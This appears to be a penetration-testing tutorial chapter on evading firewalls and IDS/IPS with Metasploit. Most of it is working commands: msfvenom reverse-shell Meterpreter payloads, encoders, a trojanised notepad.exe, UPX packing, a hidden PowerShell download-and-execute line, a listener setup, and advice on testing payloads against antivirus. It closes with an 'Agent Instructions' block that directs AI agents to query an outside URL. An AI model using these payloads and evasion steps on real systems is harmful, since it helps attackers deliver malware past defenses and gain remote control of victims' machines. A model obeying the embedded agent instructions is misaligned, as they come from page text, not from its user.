# Firewall and IDS/IPS Evasion ## **Overview** Firewalls and intrusion detection/prevention systems (IDS/IPS) are critical components of modern network security. As penetration testers, understanding how to bypass these defenses is essential for conducting stealthy and effective engagements. This chapter covers techniques for evading detection and delivering payloads while maintaining operational security. ## **Firewall and IDS/IPS Basics** 1. **Firewalls:** * Control traffic flow based on predefined rules. * Block or allow packets based on: * Source/Destination IP * Ports * Protocols * Types: * Network Firewalls (e.g., hardware-based solutions like Cisco ASA) * Host-Based Firewalls (e.g., Windows Defender Firewall) 2. **IDS/IPS:** * IDS (Intrusion Detection System): Monitors traffic for suspicious activity and raises alerts. * IPS (Intrusion Prevention System): Actively blocks malicious traffic. * Detection methods: * **Signature-Based:** Matches traffic patterns against known attack signatures. * **Anomaly-Based:** Flags traffic that deviates from normal behavior. ## **Techniques for Firewall Evasion** 1. **Port Spoofing:** * Use non-standard ports for payload delivery (e.g., port 443 for HTTPS). * Example: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe > payload.exe ``` 2. **Payload Obfuscation:** * Encode payloads using tools like `msfvenom`: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded_payload.exe ``` 3. **Split Payload Delivery:** * Deliver payloads in fragments to bypass large-payload filters. * Example: Use PowerShell to download and execute a payload in memory: ```powershell powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http:///payload.ps1')" ``` 4. **DNS Tunneling:** * Encapsulate payload traffic in DNS queries to bypass firewalls. * Example tool: `dnscat2`. 5. **HTTP/HTTPS Tunneling:** * Use HTTP/HTTPS to route traffic through firewalls that allow web traffic. * Configure a reverse shell: ```bash msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f exe > https_payload.exe ``` ## **Techniques for IDS/IPS Evasion** 1. **Signature Evasion:** * Modify payloads to avoid matching known attack patterns: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -f exe > stealth_payload.exe ``` 2. **Traffic Encryption:** * Use encrypted channels (e.g., HTTPS) for command and control traffic. * Example: ```bash use exploit/multi/handler set payload windows/meterpreter/reverse_https set LHOST set LPORT 443 exploit ``` 3. **Timing Attacks:** * Send traffic in bursts or delays to avoid triggering anomaly-based detection. * Example: Use Nmap with timing options: ```bash nmap -T2 -sS ``` 4. **Packer Tools:** * Use packers to obfuscate executable payloads. * Popular packers: * UPX: ```bash upx --best --lzma payload.exe ``` * Themida: Advanced commercial packer with anti-reverse engineering features. 5. **Legitimate Application Templates:** * Embed payloads in legitimate applications or documents. * Example: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -x notepad.exe -k -f exe > notepad_payload.exe ``` ## **Evasion Example: Using msfvenom with Custom Templates** 1. **Generate an Encrypted Payload:** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > payload.exe ``` 2. **Embed Payload in a Legitimate Application:** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -x notepad.exe -k -f exe > safe_payload.exe ``` 3. **Use HTTPS for Stealth:** ```bash msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f exe > https_payload.exe ``` 4. **Verify Payload Detection:** * Upload the payload to VirusTotal to check for AV detection: ```bash msf-virustotal -k -f payload.exe ``` ## **Best Practices for Evasion** 1. **Test in a Sandbox:** * Verify payload functionality in a controlled environment. 2. **Avoid Reuse:** * Customize payloads for each engagement to avoid detection by updated signatures. 3. **Combine Techniques:** * Layer multiple evasion methods (e.g., encoding + encryption). 4. **Stay Updated:** * Keep up with the latest evasion techniques and tools. *** ## **Command Cheatsheet** | Command | Description | | ----------------------------- | -------------------------------------------- | | `msfvenom -p ` | Generate payloads. | | `msfvenom -e ` | Encode payloads for evasion. | | `upx --best --lzma ` | Compress and obfuscate payloads. | | `msf-virustotal -k ` | Check payload detection rates on VirusTotal. | | `nmap -T2` | Conduct slow scans to avoid IDS detection. | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://edu.noirchapeau.com/metasploit/firewall-and-ids-ips-evasion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.